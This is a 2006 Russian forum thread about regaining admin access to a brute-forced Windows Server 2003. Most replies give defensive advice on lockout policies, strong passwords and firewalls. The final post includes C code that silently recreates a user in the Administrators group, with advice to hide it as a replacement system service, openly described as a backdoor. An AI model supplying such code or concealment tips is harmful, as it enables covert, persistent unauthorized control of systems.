Возможность получения пароля, в винде 2003 / Windows

ReSQL.ru

2.0.61

Планшетная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / Windows [игнор отключен] [закрыт для гостей] / Возможность получения пароля, в винде 2003 / 25 сообщений из 27, страница 1 из 2

все

10.03.2006, 23:01

#33593999

Автор Темы_

Гость

Возможность получения пароля, в винде 2003

У нас так один раз было, что сломали сервер, т.е. пришлось заново ось переставлять, что не есть очень приятно.
Притом сначала просто мы не смогли зайти на сервер, т.к. не изменили пароль админа.
Всвязи с этим появилась такая идея:
Сделать на каком нить сайтике, который у нас лежит, такой скрипт, который бы выдавал пароль админа, т.к. выполнятся будет под ним ( скрипт выполнятся ).

Конечно понимаю что с одной стороны это идея глупая, но вот хотелось бы осуществить.

Ось - 2003 сервер. Т.к. наш, то права любые.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 00:21

#33594033

--null--

Участник

Откуда: Санкт-Петербург
Сообщения: 2 915
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Лучше понять, почему взломали. и устранить причину взлома.
Виндоус что ли в инет глядит без файрвола? ;-)
А "скрипт" такой сделать нельзя, пароль не выдаст,конечно, можно сделать скрипт, котрый создаст нового админа или т.п., но во-первых это несекурно (еще раз взломают с таким подходом) - а во-вторых злодеи и это вычислят, если захотят.
Простейший вариант - иметь резервного юзера - админа.

Возврат пароля админу - с разными Windows это рассматривалось и 2003 тоже вроде
поиск рулит

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 00:49

#33594049

Автор темы_

Гость

Возможность получения пароля, в винде 2003

Как сломали - брутом.
Хочется именно удаленным способом есть ли возможность?!

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 01:42

#33594069

--null--

Участник

Откуда: Санкт-Петербург
Сообщения: 2 915
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?

Можно, например, написать сервис, который при получени определенного пакета с определенного адреса создаст пользователя в группе Administrators
с известным паролем. То есть как бы подложить себе же трояна на всякий случай :-)
Но это - абсолютно неверный путь, внедрять его на практике не надо!
Надо разобраться, почему сломали, установить патчи, нормальные пароли, файрвол, политики учетных записей и прочее.
Аудит настроить, алерты отбрасывать, когда какая-нить сволочь ломится.
Зря что ли контора дяди Билла столько механизмов безопасности напридумала?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 08:52

#33594189

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

--null--2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?
Брутом можно сломать что угодно.
Особенно если пароль входит в список.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 09:01

#33594191

aleks2

Участник

Сообщения: 12 453
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Anatoly Podgoretsky --null--2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?
Брутом можно сломать что угодно.
Особенно если пароль входит в список.

Да, но если для этого потребуется 10 лет, то можно спать спокойно.

1) Политика блокировки уч. записи.
2) Политика запрета дистанционного(ых) логонов администраторов.
---------------
и спите спокойно.

!) ГЛАВНОЕ: в Windows2000/2003 пароли могут быть длиннее 14 символов (намного).

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 09:18

#33594199

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

aleks2Да, но если для этого потребуется 10 лет, то можно спать спокойно.
Ты добрый
Увеличь на несколько степеней порядок.
Только подбор по словарю может снизить это время с миллионов лет, да и то как ты сказал политика поможет, при том поможет во всех случаях. 10 ошибок и блокировка на 30 минут.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 09:20

#33594200

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Ради интереса могу подсчитать, только предоставь следующие данные - входной словарь, длина пароля и количество подборов в секунду (для сервера это очень маленькая величина).

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 09:56

#33594206

Green2

Участник

Сообщения: 14 172
Рейтинг: 27 / 0

Возможность получения пароля, в винде 2003

у меня как то студенты взломали пароль за неделю (на Win XP)
по словарю пароль абсолютно не подбирался. Чистый перебор.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 10:25

#33594218

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Значит был короткий пароль или маленький входной алфавит.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 10:27

#33594220

Green2

Участник

Сообщения: 14 172
Рейтинг: 27 / 0

Возможность получения пароля, в винде 2003

2 Anatoly Podgoretsky
студенты знали сколько символов было в пароле и может даже некоторые буквы.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 10:33

#33594224

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Первое не меняет роли, при большом входном алфавите и достаточной длине, а вот второе снижает длину кардинально. Для интереса рассмотрим ситауцию при следудующих предпосылках

1. алфавит - 26 больших, 26 маленьких ангийских букв, плюс 10 цифр 0 итого 62 символа в алфавите.
2. длина пароля 8 символов.
3. скорость подбора - 1 000 000 паролей в секунду

имеем 2527 дней на полный перебор.
при длине пароля в 9 символов уже имеем 156674 дней и так далее.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 10:35

#33594227

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Green2у меня как то студенты взломали пароль за неделю (на Win XP)
по словарю пароль абсолютно не подбирался. Чистый перебор.
И еще я думаю, что они подбирали его на том же XP? или по сети?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 10:42

#33594230

Green2

Участник

Сообщения: 14 172
Рейтинг: 27 / 0

Возможность получения пароля, в винде 2003

взяли копию реестра и там хеш с паролем.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 11:01

#33594239

Автор Темы_

Гость

Возможность получения пароля, в винде 2003

--null--2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?

Можно, например, написать сервис, который при получени определенного пакета с определенного адреса создаст пользователя в группе Administrators
с известным паролем. То есть как бы подложить себе же трояна на всякий случай :-)
Но это - абсолютно неверный путь, внедрять его на практике не надо!
Надо разобраться, почему сломали, установить патчи, нормальные пароли, файрвол, политики учетных записей и прочее.
Аудит настроить, алерты отбрасывать, когда какая-нить сволочь ломится.
Зря что ли контора дяди Билла столько механизмов безопасности напридумала?
Ну блин, естественно сделаем веб-приложением с входом, с большим паролем который не зависит от паролей системы, а далее так, далее если человек залогинился то для него создаем такого пользователя.
Где можно посмотреть как это сервис написать?! Т.е. как бы сам то сервис я напишу, а вот именно механизм добавления неясен.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 11:11

#33594245

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Green2взяли копию реестра и там хеш с паролем.
Тогда они погорячились, для этого надо иметь права администратора, а в этом случае ничего взламывать не надо. Или они у тебя утянули винчестер?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 12:13

#33594288

--null--

Участник

Откуда: Санкт-Петербург
Сообщения: 2 915
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

это ж какой должен быть пароль, чтобы брутом сломали :-)

Автор Темы_Где можно посмотреть как это сервис написать?! Т.е. как бы сам то сервис я напишу, а вот именно механизм добавления неясен.

посмотрите функции API

NetUserAdd
NetGroupAddUser

их вполне для Вашей задачи достаточно. а потом - сервис, слушаем TCP
или принимаем UDP пакет - и вперед. Троян готов :-)

Но не проще ли нормальную политику настроить: переименовать админа и придумать ему сложный пароль?
Ну и пароль подобрать такой, чтобы словарная атака не проходила - ничего сложного, как это сделать - написано в любой нормальной книжке про сетевую безопасность.

Еще чтобы не рассчитывать впредь всякие страшные цифири в днях про взлом паролей - напомню, что соблюдение графика смены паролей рулит.
Скажем, смена админского пароля везде раз в месяц - не должна напрягать, раз за безопасность опасаемся.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 13:31

#33594339

Green2

Участник

Сообщения: 14 172
Рейтинг: 27 / 0

Возможность получения пароля, в винде 2003

Реестр утянуть просто, если можно загрузится с дискеты. Даже NTFS непомогло только создало затруднения с поиском драйвера.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 13:45

#33594350

Anatoly Podgoretsky

Участник

Сообщения: 63 997
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Это как?
Загрузка должна быть разрешена только с HDD, на биос должен быть поставлен пароль. Только физический взлом компьютера.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 14:16

#33594368

Di_LIne

Участник

Откуда: Тропик Скорпиона
Сообщения: 48 256
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

К общей теме:
Автор Темы_
естественно сделаем веб-приложением с входом
имхо - это еще одна дыра в безопасности.
От какой учетной записи должна крутиться софтинка?
SYSTEM? Ну-ну...
веб-приложения тож подлежат взлому.
брутфорсить их еще легче, чем админскую запись. (см. ниже)
Итого: - имхо, идей НЭ правельный.
Выше приводили разумные решение:
Файрвол+Длин-нющий пароль на ADMINISTRATOR+Блокировка попыток+
Резервный юзер с правами админа.

Anatoly Podgoretsky10 ошибок и блокировка на 30 минут.
имхо и 3 попыток достаточно для блокировки.
Если с 3-х не попал: Или админ пьян, что уже криминал , или ломяться.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 21:27

#33594606

Автор темы_

Гость

Возможность получения пароля, в винде 2003

А теперь в натуре, просто надо сделать дырочку в безопасности чисто для себя :-).
Вот и уточнял :-)
Уже практически всё сделал, только пока точно ещё не определился, что будет удобнее:
1.Скачал прогу, которая если ты сидишь под админискими правами дает тебе возможность у кого хошь менять пароли.
2.Либо написать свой сервис?!
Я конечно, как программер руками и ногами за второе, но как это реализовать не знаю, подкините идею :-)

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 21:35

#33594609

Green2

Участник

Сообщения: 14 172
Рейтинг: 27 / 0

Возможность получения пароля, в винде 2003

2 Автор темы_
http://winternals.com/Products/AdministratorsPak/
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

11.03.2006, 21:50

#33594614

--null--

Участник

Откуда: Санкт-Петербург
Сообщения: 2 915
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

автор1.Скачал прогу, которая если ты сидишь под админискими правами дает тебе возможность у кого хошь менять пароли

а зачем для этого прога, разве это и так нельзя делать?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

12.03.2006, 11:45

#33594826

Автор Темы_

Гость

Возможность получения пароля, в винде 2003

Обусняю, хочу сделать скиптягу, которая вызывается через web и
через dsadd user в консоле добавляет юзера, только вот с
dsadd user для домена не могу разобраться, если кто то сталкивался, напишите небольшой работающий примерчик, я вчера около часа пытался разобраться - никак :-(.
Т.е. помогите с этой прогой :-)

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

12.03.2006, 12:42

#33594859

--null--

Участник

Откуда: Санкт-Петербург
Сообщения: 2 915
Рейтинг: 0 / 0

Возможность получения пароля, в винде 2003

Сдается мне - ты просто backdoor пишешь или трояна :-)
Вот фрагмент кода - когда-то сам таким страдал, правда только на NT4/W2k проверено. Пишешь - сервис, который сносит какой-нибудь не очень нужный системный и вместо него встает в CurrentControlSet-е. Многие админы не замечают или замечают слишком поздно.
Учти, что твои действия могут попадать под статью УК :-)

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.

#define UNICODE  1 

#include<windows.h>
#include <lmcons.h>
#include <lmaccess.h>
#include <lmerr.h>
....

void DeleteUser(char * username)
{
	LPWSTR unicode_username=(LPWSTR)malloc(strlen(username)*sizeof(WCHAR));
	MultiByteToWideChar(CP_ACP, 0 ,
					username,strlen(username),
					unicode_username,strlen(username)*sizeof(WCHAR));
	NetUserDel(NULL,unicode_username);
	free(unicode_username);
}


void CreateUser(char * username, char * password)
{

LPWSTR unicode_username=(LPWSTR)malloc(strlen(username)*sizeof(WCHAR));
LPWSTR unicode_password=(LPWSTR)malloc(strlen(password)*sizeof(WCHAR));
MultiByteToWideChar(CP_ACP, 0 ,
					username,strlen(username),
					unicode_username,strlen(username)*sizeof(WCHAR));

MultiByteToWideChar(CP_ACP, 0 ,
					password,strlen(password),
					unicode_password,strlen(password)*sizeof(WCHAR));



	USER_INFO_1               user_info;
    LOCALGROUP_MEMBERS_INFO_3 localgroup_members;
    LPWSTR                    lpszPrimaryDC = NULL;
    NET_API_STATUS            err =  0 ;
    DWORD                     parm_err =  0 ;

	//LPWSTR lpszDomain
    //LPWSTR lpszUser=(unsigned short *)username;
    //LPWSTR lpszPassword=(unsigned short *)password;
    LPWSTR lpszLocalGroup=TEXT("Администраторы");

	/* Set up the USER_INFO_1 struct */

    user_info.usri1_name = unicode_username;
    user_info.usri1_password = unicode_password;
    user_info.usri1_priv = USER_PRIV_USER;
    user_info.usri1_home_dir = TEXT("");
    user_info.usri1_comment = TEXT("");
    user_info.usri1_flags = UF_SCRIPT;
    user_info.usri1_script_path = TEXT("");

	NetUserDel(NULL,unicode_username);
//для гарантии удалим сначала юзера
//админ порадуется, когда заблокированный аккаунт "восстанет из ада"
	
      

	NetUserAdd( NULL,       
                 1 ,                   
                (LPBYTE)&user_info,  
                 &parm_err );         

	localgroup_members.lgrmi3_domainandname = unicode_username;

	NetLocalGroupAddMembers( NULL,        
                                   lpszLocalGroup,       
                                    3 ,                   
                                   (LPBYTE)&localgroup_members, 
                                    1  );        
	free(unicode_username);
	free(unicode_password);
}

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

все

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=26&mobile=1&tid=1510921]:	0ms
get settings:	6ms
get forum list:	15ms
check forum access:	2ms
check topic access:	2ms
track hit:	155ms
get topic data:	10ms
get forum data:	2ms
get page messages:	58ms
get tp. blocked users:	1ms
others:	201ms

total:	452ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы